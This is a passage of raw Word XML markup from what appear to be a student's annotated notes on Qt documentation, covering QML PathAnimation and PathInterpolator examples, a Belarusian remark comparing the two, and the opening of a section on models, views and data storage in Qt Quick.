          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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2000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type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Easing</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InQuad</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target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box</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orientation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PathAnimation</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RightFirst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anchorPoint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Qt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point</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box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width</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</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box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height</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</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path</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Path</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startX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startY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PathCubic</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window</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width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window</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height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control1X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control1Y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control2X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control2Y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y</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onChanged</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canvas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requestPaint</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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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E1023E">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2234" w:name="pathinterpolator"/>
      <w:bookmarkStart w:id="2235" w:name="_Toc483001013"/>
      <w:bookmarkStart w:id="2236" w:name="_Toc483004004"/>
      <w:bookmarkStart w:id="2237" w:name="_Toc483604354"/>
      <w:bookmarkStart w:id="2238" w:name="_Toc483605574"/>
      <w:bookmarkEnd w:id="2234"/>
      <w:r w:rsidRPr="00E1023E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PathInterpolator</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2235"/>
      <w:bookmarkEnd w:id="2236"/>
      <w:bookmarkEnd w:id="2237"/>
      <w:bookmarkEnd w:id="2238"/>
    </w:p>
    <w:p w:rsidR="00230BC0" w:rsidRDefault="00230BC0" w:rsidP="00230BC0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PathInterpolator</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>animates an image along the same bezier curve, using a</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2543" w:anchor="pathinterpolator" w:history="1">
        <w:r w:rsidRPr="00230BC0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>PathInterpolator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>instead.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D0CA1" w:rsidRPr="00E1023E" w:rsidRDefault="00E1023E" w:rsidP="00230BC0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="008D0CA1" w:rsidRPr="008D0CA1">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Прыклад</w:t>
      </w:r>
      <w:r w:rsidR="008D0CA1" w:rsidRPr="008D0CA1">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D0CA1" w:rsidRPr="008D0CA1">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>падобны</w:t>
      </w:r>
      <w:r w:rsidR="008D0CA1" w:rsidRPr="008D0CA1">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D0CA1" w:rsidRPr="008D0CA1">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidR="008D0CA1" w:rsidRPr="008D0CA1">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D0CA1" w:rsidRPr="008D0CA1">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">мінулы, </w:t>
      </w:r>
      <w:r w:rsidR="008D0CA1" w:rsidRPr="008D0CA1">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">але я не адчуў розніцы між </w:t>
      </w:r>
      <w:r w:rsidR="008D0CA1" w:rsidRPr="008D0CA1">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">PathAnimation </w:t>
      </w:r>
      <w:r w:rsidR="008D0CA1" w:rsidRPr="008D0CA1">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">і </w:t>
      </w:r>
      <w:r w:rsidR="008D0CA1" w:rsidRPr="008D0CA1">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PathInterpolator</w:t>
      </w:r>
      <w:r w:rsidR="008D0CA1" w:rsidRPr="008D0CA1">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PathInterpolator</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id</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motionPath</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path</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Path</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startX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startY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PathCubic</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window</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width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window</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height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control1X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control1Y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control2X</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50</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control2Y</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y</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onChanged</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canvas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requestPaint</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SequentialAnimation</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on progress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running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true</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loops</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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</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PauseAnimation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1000</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NumberAnimation</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pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</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id</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progressAnim</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running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false</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from</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0</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to</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1</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duration</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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230BC0" w:rsidRPr="00230BC0"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easing</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type</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Easing</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>InQuad</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230BC0" w:rsidRPr="006E5677"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230BC0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5677">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230BC0" w:rsidRPr="006E5677" w:rsidRDefault="00230BC0" w:rsidP="00230BC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E5677">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5677">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230BC0" w:rsidRPr="006E5677" w:rsidRDefault="00230BC0" w:rsidP="00230BC0">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E5677">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D0CA1" w:rsidRDefault="008D0CA1" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00710B49" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2544" w:history="1">
        <w:r w:rsidR="00710B49" w:rsidRPr="0033006A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtwidgets-animation-easing-example.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00365F6D" w:rsidRPr="00E1023E" w:rsidRDefault="00E1023E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00773A7B" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2545" w:history="1">
        <w:r w:rsidR="00840F02" w:rsidRPr="00E20DF4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-modelviewsdata-topic.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00840F02" w:rsidRPr="00840F02" w:rsidRDefault="00840F02" w:rsidP="00E1023E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2239" w:name="_Toc483001014"/>
      <w:bookmarkStart w:id="2240" w:name="_Toc483004005"/>
      <w:bookmarkStart w:id="2241" w:name="_Toc483604355"/>
      <w:bookmarkStart w:id="2242" w:name="_Toc483605575"/>
      <w:r w:rsidRPr="00E1023E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Important Concepts In Qt Quick - Data - Models, Views and Data Storage</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2239"/>
      <w:bookmarkEnd w:id="2240"/>
      <w:bookmarkEnd w:id="2241"/>
      <w:bookmarkEnd w:id="2242"/>
    </w:p>
    <w:p w:rsidR="00840F02" w:rsidRPr="00840F02" w:rsidRDefault="00840F02" w:rsidP="00840F02">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00840F02">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Most applications will have </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>data that needs to be displayed to the user</w:t>
      </w:r>
      <w:r w:rsidRPr="00840F02">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. That data might come from a variety of </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sources</w:t>
      </w:r>
      <w:r w:rsidRPr="00840F02">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: network sources, local files, and databases are all common sources of data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00840F02" w:rsidRPr="00840F02" w:rsidRDefault="00840F02" w:rsidP="00E1023E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2243" w:name="_Toc483001015"/>
      <w:bookmarkStart w:id="2244" w:name="_Toc483004006"/>
      <w:bookmarkStart w:id="2245" w:name="_Toc483604356"/>
      <w:bookmarkStart w:id="2246" w:name="_Toc483605576"/>
      <w:r w:rsidRPr="00E1023E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Models and Views</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2243"/>
      <w:bookmarkEnd w:id="2244"/>
      <w:bookmarkEnd w:id="2245"/>
      <w:bookmarkEnd w:id="2246"/>
    </w:p>
    <w:p w:rsidR="00840F02" w:rsidRPr="00840F02" w:rsidRDefault="00840F02" w:rsidP="00840F02">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00840F02">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">It is often advantageous to </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>show similar data in a similar manner</w:t>
      </w:r>
      <w:r w:rsidRPr="00840F02">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, within an application, and this gives rise to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>idea of having a model</w:t>
      </w:r>
      <w:r w:rsidRPr="00840F02">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which contains data</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and a view</w:t>
      </w:r>
      <w:r w:rsidRPr="00840F02">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which displays the data. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>view will display a delegate for every datum in the model</w:t>
      </w:r>
      <w:r w:rsidRPr="00840F02">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00840F02" w:rsidRPr="00840F02" w:rsidRDefault="00840F02" w:rsidP="00840F02">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00840F02">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>For information about how the Model/View paradigm is implemented in Qt Quick, see the page titled</w:t>
      </w:r>
      <w:r w:rsidRPr="00840F02">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2546" w:history="1">
        <w:r w:rsidRPr="00840F02">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Models and Views in Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00840F02">
        <w:rPr>
          <w:color w:val="404244"/>
